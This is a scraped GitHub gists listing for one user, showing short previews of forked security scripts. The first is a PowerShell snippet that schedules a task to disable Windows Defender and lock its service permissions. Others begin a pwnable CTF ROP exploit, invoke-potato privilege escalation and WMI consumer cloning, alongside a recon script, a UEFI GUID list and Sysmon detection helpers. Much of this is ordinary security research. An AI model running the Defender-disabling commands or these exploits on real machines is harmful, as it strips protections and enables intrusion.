Az H0K5
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)' | |
| $a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline | |
| Register-ScheduledTask -TaskName 'TestTask' -Action $a | |
| $svc = New-Object -ComObject 'Schedule.Service' | |
| $svc.Connect() | |
| $user = 'NT SERVICE\TrustedInstaller' | |
| $folder = $svc.GetFolder('\') |
H0K5
/ EDK2_2015_GUIDs-2017-04-27.csv
Created
October 21, 2019 14:45
— forked from Velocet/EDK2_2015_GUIDs-2017-04-27.csv
EDK2 2015 GUIDs - Consolidated list of all *.dec/*.inf files as of 2017-04-27 (some duplicates removed)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 00000000-0000-0000-0000-000000000000 | Zero | |
|---|---|---|
| 00000000-0000-0000-0000-000000000000 | EfiPartTypeUnused | |
| 00000000-0000-0000-0000-000000000000 | EfiTpmDeviceInstanceNone | |
| 00160F8D-2B35-4DF2-BBE0-B272A8D631F0 | FirmwarePerformanceDxe | |
| 00214CC1-06D1-45FE-9700-DCA5726AD7BF | ArmVirtPlatformLib | |
| 0049858F-8CA7-4CCD-918B-D952CBF32975 | VirtioFdtDxe | |
| 0053D9D6-2659-4599-A26B-EF4536E631A9 | ShellAlias | |
| 0065D394-9951-4144-82A3-0AFC8579C251 | EfiPeiRscHandlerPpi | |
| 00720665-67EB-4A99-BAF7-D3C33A1C7CC9 | EfiTcp4ServiceBindingProtocol | |
| 00C86DB8-013B-4FF4-B8E9-208F4FCF1C00 | LibSignal |
H0K5
/ waybackurls.py
Created
October 16, 2019 16:57
— forked from mhmdiaa/waybackurls.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import sys | |
| import json | |
| def waybackurls(host, with_subs): | |
| if with_subs: | |
| url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host | |
| else: | |
| url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host |
H0K5
/ PSProcmon.psm1
Created
February 21, 2019 15:48
— forked from mattifestation/PSProcmon.psm1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # These keyword values can be obtained with: logman query providers Microsoft-Windows-Kernel-Registry | |
| [Flags()] | |
| enum RegistryOptions { | |
| CloseKey = 0x00000001 | |
| QuerySecurityKey = 0x00000002 | |
| SetSecurityKey = 0x00000004 | |
| EnumerateValueKey = 0x00000010 | |
| QueryMultipleValueKey = 0x00000020 | |
| SetInformationKey = 0x00000040 | |
| FlushKey = 0x00000080 |
H0K5
/ pwnable-hackerssecret-unexploitable-rop.py
Created
January 25, 2019 15:54
— forked from cubarco/pwnable-hackerssecret-unexploitable-rop.py
Pure ROP and SROP.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # coding=utf8 | |
| from pwn import p64, process, ELF | |
| from time import sleep | |
| EXECUTABLE = '/home/unexploitable/unexploitable' | |
| elf = ELF(EXECUTABLE) |
H0K5
/ invoke-potato.ps1
Created
December 4, 2018 10:50
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-DelegateType | |
| { | |
| Param | |
| ( | |
| [OutputType([Type])] | |
H0K5
/ WmiEventConsumerClassDerivation.ps1
Created
November 13, 2018 12:38
— forked from mattifestation/WmiEventConsumerClassDerivation.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function New-ActiveScriptEventConsumerClass { | |
| <# | |
| .SYNOPSIS | |
| Creates an ActiveScriptEventConsumer WMI class in the namespace of your choosing. | |
| .DESCRIPTION | |
| New-ActiveScriptEventConsumerClass creates a clone of the ActiveScriptEventConsumer WMI event consumer class using the class name and namespace name of your choosing. |
H0K5
/ SysmonEventGUIDParser.ps1
Created
November 13, 2018 12:38
— forked from mattifestation/SysmonEventGUIDParser.ps1
Extracts fields from sysmon process and logon GUIDs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Author: Matthew Graeber (@mattifestation) | |
| $Epoch = Get-Date '01/01/1970' | |
| # Conversion trick taken from https://blogs.technet.microsoft.com/heyscriptingguy/2017/02/01/powertip-convert-from-utc-to-my-local-time-zone/ | |
| $StrCurrentTimeZone = (Get-WmiObject Win32_timezone).StandardName | |
| $TZ = [TimeZoneInfo]::FindSystemTimeZoneById($StrCurrentTimeZone) | |
| # Parse out all the LogonGUID fields for sysmon ProcessCreate events | |
| Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } | ForEach-Object { |
H0K5
/ Get-ExtendedAttribute.ps1
Created
October 4, 2018 09:14
— forked from jaredcatkinson/Get-ExtendedAttribute.ps1
Get-ExtendedAttribute is a function to iterate through the C:\ volume looking for files with Extended Attributes. This code is beta and meant only for the purpose of a blog post on detection methodology.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This is really beta code used in my Detection Methodology post. I plan to write more efficient code when I get some more time. | |
| function Get-ExtendedAttribute | |
| { | |
| foreach($file in (Get-ChildItem -Path C:\ -Recurse)) | |
| { | |
| $obj = Get-ExtendedAttribute -FilePath $file.FullName | Where-Object {$_ -ne $null} | |
| $obj | Add-Member -MemberType NoteProperty -Name FileName -Value $file.FullName | |
| Write-Output $obj | |
| } |
H0K5
/ gist:6528ee0e0cc016cd76f1b1c8c81b7898
Created
September 22, 2018 00:13
— forked from rootbsd/gist:d7af9123684d35fcca566e9c4a8f3593
Open Explorer.exe in the current WSL -Windows Subsystem for Linux- directory (Ubuntu Only but easy to adapt)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function pop() { | |
| if [ $(pwd | sed -n -e 's!^/mnt/!!p' | wc -c) == 0 ] | |
| then | |
| cmd.exe /c "echo %LOCALAPPDATA%" > /tmp/LOCALAPPDATA | |
| dest="$(strings -a /tmp/LOCALAPPDATA)\\Packages" | |
| cmd.exe /c "dir $dest | findstr CanonicalGroupLimited" > /tmp/Canonical | |
| repo=$(strings -a /tmp/Canonical | awk '{print $NF}') | |
| root=$(echo "$dest\\$repo\\LocalState\\rootfs") | |
| explorer.exe $(echo ${root}$(pwd | sed 's!/!\\!g')) | |
| else |
NewerOlder